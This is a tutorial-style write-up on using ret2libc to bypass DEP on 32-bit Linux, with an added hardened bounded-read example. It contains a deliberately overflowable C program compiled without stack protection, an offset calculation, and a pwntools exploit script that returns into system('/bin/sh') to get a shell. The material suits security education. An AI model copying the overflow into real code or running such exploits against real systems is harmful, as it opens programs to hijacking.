Using RET2LIBC to bypass DEP under Linux
⑴ Principle Analysis:
Code in the system libraries is not blocked by DEP (their code pages have to be executable; DEP itself is covered in more detail in my previous article), so DEP can be bypassed by pointing the overwritten return address at an existing library function instead of at injected shellcode. Returning into the library function system() yields a shell.
⑵ Environment Preparation:
i. Vulnerable code:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

void flow(void) {
    char buf[128];
    read(STDIN_FILENO, buf, 256);   /* reads up to 256 bytes into a 128-byte buffer: stack overflow */
}

int main(void) {
    flow();
    char a[] = "Hello";
    write(STDOUT_FILENO, a, strlen(a));
    return 0;
}
Compile instructions:
gcc -fno-stack-protector -g -m32 -o vuln vuln.c
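For contrast with flow() above, here is a bounded replacement for its read(), added as an example that is not part of the original post: it never stores more than the buffer can hold, always NUL-terminates, and the helper demo_overlong_input() (a constructed harness, not from the post) feeds the same kind of oversized input through a pipe to show it is truncated instead of overflowing.

```c
#include <stddef.h>
#include <string.h>
#include <unistd.h>

/* Hardened counterpart of the read() in flow(): stores at most cap - 1 bytes
 * into buf and always NUL-terminates, so a 256-byte input cannot run past a
 * 128-byte buffer. Loops because read() may return short counts. Returns the
 * number of bytes stored, or -1 on error. */
ssize_t read_bounded(int fd, char *buf, size_t cap) {
    size_t used = 0;
    if (cap == 0) return -1;
    while (used < cap - 1) {
        ssize_t n = read(fd, buf + used, cap - 1 - used);
        if (n < 0) return -1;
        if (n == 0) break;            /* EOF: stop early */
        used += (size_t)n;
    }
    buf[used] = '\0';
    return (ssize_t)used;
}

/* Safe version of flow(): the limit comes from sizeof(buf), not from a
 * hard-coded count that is larger than the buffer. */
void flow_safe(int fd) {
    char buf[128];
    (void)read_bounded(fd, buf, sizeof buf);
}

/* Constructed demonstration: write `len` bytes of 'A' into a pipe and read
 * them into a `cap`-byte buffer. Returns the number of bytes stored, -1 on
 * error, or -2 if the result was not NUL-terminated. */
ssize_t demo_overlong_input(size_t len, size_t cap) {
    int fds[2];
    char buf[512], input[512];
    if (len > sizeof input || cap > sizeof buf) return -1;
    memset(input, 'A', len);
    if (pipe(fds) < 0) return -1;
    (void)write(fds[1], input, len);
    close(fds[1]);
    ssize_t stored = read_bounded(fds[0], buf, cap);
    close(fds[0]);
    if (stored >= 0 && buf[stored] != '\0') return -2;
    return stored;
}
```

With the post's 256-byte input and a 128-byte buffer, demo_overlong_input(256, 128) stores 127 bytes and leaves the rest unread.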
ii. Test environment:
Test system: Kali 2.0 Rolling
Auxiliary plugin: PEDA
⑶ Test Analysis:
i. Return address of the vulnerable function flow():
Vulnerable function return address: 0xffffd2ac.
ii. Buffer start address:
Buffer start address: 0xffffd220
iii. Address of the system() function
iv. system() parameter: "/bin/sh"
v. system() function source code:
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#include <errno.h>

int system(const char *cmdstring)
{
    pid_t pid;
    int status;

    if (cmdstring == NULL) {
        return (1);
    }
    if ((pid = fork()) < 0) {
        status = -1;
    } else if (pid == 0) {
        /* child: run the command through the shell */
        execl("/bin/sh", "sh", "-c", cmdstring, (char *)0);
        _exit(127);   /* not reached if the child's execl() succeeds */
    } else {
        /* parent: wait for the child, retrying if interrupted by a signal */
        while (waitpid(pid, &status, 0) < 0) {
            if (errno != EINTR) {
                status = -1;
                break;
            }
        }
    }
    return status;
}
⑷ Attack Process:
i. Calculate the payload length:
Our goal is to overwrite the return address with the address of system(), and to place after it the address of the "/bin/sh" string we found, as the parameter of system() (the following 8 bytes: four bytes of return address for system(), then four bytes of parameter address).
So size(payload) = address(ret) - address(buf) + 12 = 0xffffd2ac - 0xffffd220 + 12 = 152
ii. Design the payload structure:
Note: addr(ret), the return address for system(), can be an arbitrary value, because once the program has been hijacked into the shell we never rely on system() returning.
iii. Write the exploit script:
from pwn import *

sh = 0xf7f4a808        # address of the "/bin/sh" string
system = 0xf7e0bc70    # address of system()
ret = 0x565555d4       # return address for system(); arbitrary
payload = b'A' * 140 + p32(system) + p32(ret) + p32(sh)
p = process('./vuln')
p.send(payload)
p.interactive()
Execution:
Success.